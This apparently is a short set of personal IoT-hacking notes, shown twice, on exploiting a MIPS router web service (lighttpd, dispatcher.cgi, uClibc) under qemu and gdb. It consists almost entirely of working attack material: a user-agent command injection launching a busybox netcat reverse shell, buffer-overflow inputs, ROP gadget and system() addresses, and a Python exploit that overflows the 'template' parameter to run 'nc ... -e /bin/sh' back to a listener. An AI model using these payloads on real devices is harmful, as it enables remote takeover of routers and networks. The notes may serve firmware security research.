hortinstein · August 29, 2018 18:34
diff --git a/IOT Hacking b/IOT Hacking
 curl 127.0.0.1:80 -A '`/bin/busybox nc 127.0.0.1 5555 -e /bin/sh`'

 sudo chroot . ./qemu-mipsel -g 4321 bin/overflowme `python -c "print 'A'*260+'\xA0\x07\x40'"`

 #start lighttpd
 chroot . /usr/sbin/lighttpd -f ./etc/init.d/service_httpd/lighttpd.conf

 #start gdb server
 gdbserver --attach 0.0.0.0:1234 715

 #kill the GDB server && find new dispatch pid && start the new GDB server
 kill -9 `ps -ae | grep gdbserver | cut -d " " -f 3` && kill -9 `ps -ae | grep dispatcher | cut -d " " -f 3` && 

 gdbserver --attach 0.0.0.0:1234 `ps -ae | grep dispatcher | cut -d " " -f 3`

 set arch mips
 set endian little
 target remote 0.0.0.0:1234

 curl http://127.0.0.1/dispatcher.cgi?template=common.jsfw_.pdf.gz`python -c 'print 0x50C*"A"+"BABA"'`


 ----------------------------------------------------------------------------------------------------------------
 |  Address     |  Action                                              |  Control Jump                          |
 ----------------------------------------------------------------------------------------------------------------
 |  0x0042C1AC  |  addiu $a0,$sp,0x130+var_E4                          |  jalr  $s2                             |
 |  0x0042FBB0  |  addiu $a0,$sp,0x1038+var_810                        |  jalr  $s0                             |
 |  0x00432624  |  addiu $a0,$sp,0x158+var_E8                          |  jalr  $s0                             |
 ----------------------------------------------------------------------------------------------------------------

 0049FA04 - system
 p &system = 0x2ab014a0
 2aed6000-2af2d000 r-xp 00000000 08:01 586684     /root/squashfs-root/lib/libuClibc-0.9.29.so


 curl -G -v "http://localhost:30001/data" --data-urlencode "msg=hello world" --data-urlencode "msg2=hello world2"

 #gets the 
 objdump -T /root/squashfs-root/lib/libuClibc-0.9.29.so | grep system | cut -d' ' -f1

 #gets the libuCl 
 cat /proc/1820/maps | grep libuCl | grep x | cut -d' ' -f1 | cut -d'-' -f1


 ``` py
 import urllib2

 buf = "A" * 0x4eB

 # 2AF227E0

 buf += "\xE0\x27\xF2\x2A" #$s0 = system

 buf += "A" * 32 # \x20 
 #2AEFB7A0
 buf += "\xA0\xB7\xEF\x2A" #$ra = gadget

 buf += "A" * 0x18
 buf += 'nc${IFS}172.17.5.102${IFS}5555${IFS}-e${IFS}/bin/sh'

 #172.17.5.102 5555
 url = 'http://172.17.5.100:8080/dispatcher.cgi?template=jquery.js.pdf.gz' + buf
 print urllib2.urlopen(url)
 ```
	curl 127.0.0.1:80 -A '`/bin/busybox nc 127.0.0.1 5555 -e /bin/sh`'

	sudo chroot . ./qemu-mipsel -g 4321 bin/overflowme `python -c "print 'A'*260+'\xA0\x07\x40'"`

	#start lighttpd
	chroot . /usr/sbin/lighttpd -f ./etc/init.d/service_httpd/lighttpd.conf

	#start gdb server
	gdbserver --attach 0.0.0.0:1234 715

	#kill the GDB server && find new dispatch pid && start the new GDB server
	kill -9 `ps -ae \| grep gdbserver \| cut -d " " -f 3` && kill -9 `ps -ae \| grep dispatcher \| cut -d " " -f 3` &&

	gdbserver --attach 0.0.0.0:1234 `ps -ae \| grep dispatcher \| cut -d " " -f 3`

	set arch mips
	set endian little
	target remote 0.0.0.0:1234

	curl http://127.0.0.1/dispatcher.cgi?template=common.jsfw_.pdf.gz`python -c 'print 0x50C*"A"+"BABA"'`


	----------------------------------------------------------------------------------------------------------------
	\| Address \| Action \| Control Jump \|
	----------------------------------------------------------------------------------------------------------------
	\| 0x0042C1AC \| addiu $a0,$sp,0x130+var_E4 \| jalr $s2 \|
	\| 0x0042FBB0 \| addiu $a0,$sp,0x1038+var_810 \| jalr $s0 \|
	\| 0x00432624 \| addiu $a0,$sp,0x158+var_E8 \| jalr $s0 \|
	----------------------------------------------------------------------------------------------------------------

	0049FA04 - system
	p &system = 0x2ab014a0
	2aed6000-2af2d000 r-xp 00000000 08:01 586684 /root/squashfs-root/lib/libuClibc-0.9.29.so


	curl -G -v "http://localhost:30001/data" --data-urlencode "msg=hello world" --data-urlencode "msg2=hello world2"

	#gets the
	objdump -T /root/squashfs-root/lib/libuClibc-0.9.29.so \| grep system \| cut -d' ' -f1

	#gets the libuCl
	cat /proc/1820/maps \| grep libuCl \| grep x \| cut -d' ' -f1 \| cut -d'-' -f1


	``` py
	import urllib2

	buf = "A" * 0x4eB

	# 2AF227E0

	buf += "\xE0\x27\xF2\x2A" #$s0 = system

	buf += "A" * 32 # \x20
	#2AEFB7A0
	buf += "\xA0\xB7\xEF\x2A" #$ra = gadget

	buf += "A" * 0x18
	buf += 'nc${IFS}172.17.5.102${IFS}5555${IFS}-e${IFS}/bin/sh'

	#172.17.5.102 5555
	url = 'http://172.17.5.100:8080/dispatcher.cgi?template=jquery.js.pdf.gz' + buf
	print urllib2.urlopen(url)
	```